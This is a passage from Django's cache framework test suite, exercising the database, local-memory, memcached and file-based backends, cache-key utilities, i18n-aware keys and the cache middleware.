self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
client_library_name = 'memcache'
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
client_library_name = 'pylibmc'
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = timezone.get_current_timezone_name()
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Timezone-dependent cache keys should use ASCII characters only
# (#17476). The implementation here is a bit odd (timezone.utc is an
# instance, not a class), but it simulates the correct conditions.
class CustomTzName(timezone.utc):
pass
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName):
CustomTzName.zone = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super().setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
